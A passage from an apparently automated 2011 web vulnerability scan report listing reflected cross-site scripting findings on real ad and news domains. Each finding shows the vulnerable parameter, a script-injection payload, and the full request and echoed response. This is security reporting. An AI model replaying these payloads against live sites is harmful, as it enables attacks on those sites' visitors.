Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 392
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All46703"><script>alert(1)</script>3613c51ffe3/14a155dda-808a-4648-a03d-f65de2ef0ada/187855159/x90/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.52. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b088e"><script>alert(1)</script>c4e352e43c0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90b088e"><script>alert(1)</script>c4e352e43c0 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 384
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/;httponly

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada/681954732/x90b088e"><script>alert(1)</script>c4e352e43c0/default/empty.gif/726348573830327254356f4142562f46?x" target="_top">
...[SNIP]...

2.53. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8380f<script>alert(1)</script>6e68ad76aa0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont38380f<script>alert(1)</script>6e68ad76aa0&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:04 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4521

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont38380f<script>alert(1)</script>6e68ad76aa0_ib = '<div id="te-clr1-att02cont38380f<script>
...[SNIP]...

2.54. http://choices.truste.com/ca [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 494f6<script>alert(1)</script>1666fb1c095 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90494f6<script>alert(1)</script>1666fb1c095&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90494f6<script>alert(1)</script>1666fb1c095,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3'
...[SNIP]...

2.55. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 15721<script>alert(1)</script>2a12d89ce41 was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr15721<script>alert(1)</script>2a12d89ce41 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr15721<script>alert(1)</script>2a12d89ce41','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.56. http://choices.truste.com/ca [ox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 125a2<script>alert(1)</script>e1a6fd9e849 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20125a2<script>alert(1)</script>e1a6fd9e849&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20125a2<script>alert(1)</script>e1a6fd9e849,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','notice
...[SNIP]...

2.57. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 119da<script>alert(1)</script>1f53089f8a1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr119da<script>alert(1)</script>1f53089f8a1&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728,'height':90,'ox':20,'oy':0,'plc':'tr119da<script>alert(1)</script>1f53089f8a1','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont3','noticeBaseUrl':'http://
...[SNIP]...

2.58. http://choices.truste.com/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 759b0<script>alert(1)</script>4cc70211f6 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728759b0<script>alert(1)</script>4cc70211f6&h=90&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4120

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont3_bi = {'baseName':'te-clr1-att02cont3','anchName':'te-clr1-att02cont3-anch','width':728759b0<script>alert(1)</script>4cc70211f6,'height':90,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont3-itl','iconSpanId':'te-clr1-att02cont3-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':
...[SNIP]...

2.59. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 757cf<script>alert(1)</script>9c81586b66e was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002757cf<script>alert(1)</script>9c81586b66e&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286737327/direct;wi.728;hi.90/014a155dda-808a-4648-a03d-f65de2ef0ada?click=http%3A%2F%2Ftracker-clk.bidder7.mookie1.com%2Ftr-clk%3Fa%3D4a155dda-808a-4648-a03d-f65de2ef0ada%26b%3D1%26c%3D10000205%26x%3Drtbbid2us2%26url%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:05 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4029

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont3_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002757cf<script>alert(1)</script>9c81586b66e','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

2.60. http://content.usatoday.com/apps/insidepage/crc.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /apps/insidepage/crc.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 98134<script>alert(1)</script>2d20feb71dc was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/insidepage/crc.ashx?callback=commentcount98134<script>alert(1)</script>2d20feb71dc&articleId=46732364.story HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_ppv=24

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:56 GMT
Content-Length: 132

commentcount98134<script>alert(1)</script>2d20feb71dc({"articleId": "46732364.story","commentCount": "137","recommendCount": "11"});

2.61. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac370'%3balert(1)//316d65e6609 was submitted in the $ parameter. This input was echoed as ac370';alert(1)//316d65e6609 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=ac370'%3balert(1)//316d65e6609&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:ac370';alert(1)//316d65e6609;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1589B1099,2#702968|0,1,1;expires=Wed, 08 Jun 2011 15:36:11 GMT;path=/;domain=.zedo.com;
ETag: "ae1b52-8181-4a207a1458040"
Vary: Accept-Encoding
X-Varnish: 1332201874 1332193309
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=158
Expires: Mon, 09 May 2011 15:38:49 GMT
Date: Mon, 09 May 2011 15:36:11 GMT
Connection: close
Content-Length: 2055

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ac370';alert(1)//316d65e6609';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,ac370';alert(1)//316d65e6609;z="+Math.random();}

if(zzuid=='unknown')zzuid='5ajh4goBADQAAFjiiCYAAABN~042311';

var zzhasA
...[SNIP]...

2.62. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-406/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87099"%3balert(1)//5fff92f106d was submitted in the $ parameter. This input was echoed as 87099";alert(1)//5fff92f106d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-406/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=9&q=&$=87099"%3balert(1)//5fff92f106d&s=1&l=http%3A//ad.doubleclick.net/click%253Bh%253Dv8/3b02/f/180/%252a/k%253B230856172%253B0-0%253B0%253B54838158%253B4307-300/250%253B38780865/38798622/1%253B%253B%257Eaopt%253D6/0/ff/1%253B%257Esscs%253D%253fhttp%3A//adclick.g.doubleclick.net/aclk%253Fsa%253DL%2526ai%253DBqcIQ3QnITYHLMdHzlAfkkdilD9mI4PMBAAAAEAEgjfDlBTgAWMG1jcYbYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEEmAKIJ8ACAuACAOoCDjMwMHgyNTBBX01vbmV5-ALw0R6QA6QDmAPgA6gDAeAEAQ%2526num%253D0%2526sig%253DAGiWqtzUGb2mvqDPCSfB7Czyb06Trd9-Zg%2526client%253Dca-pub-6743622525202572%2526adurl%253Dhttp%253a%252f%252fwww.csmonitor.com/&z=0.16775888670235872 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
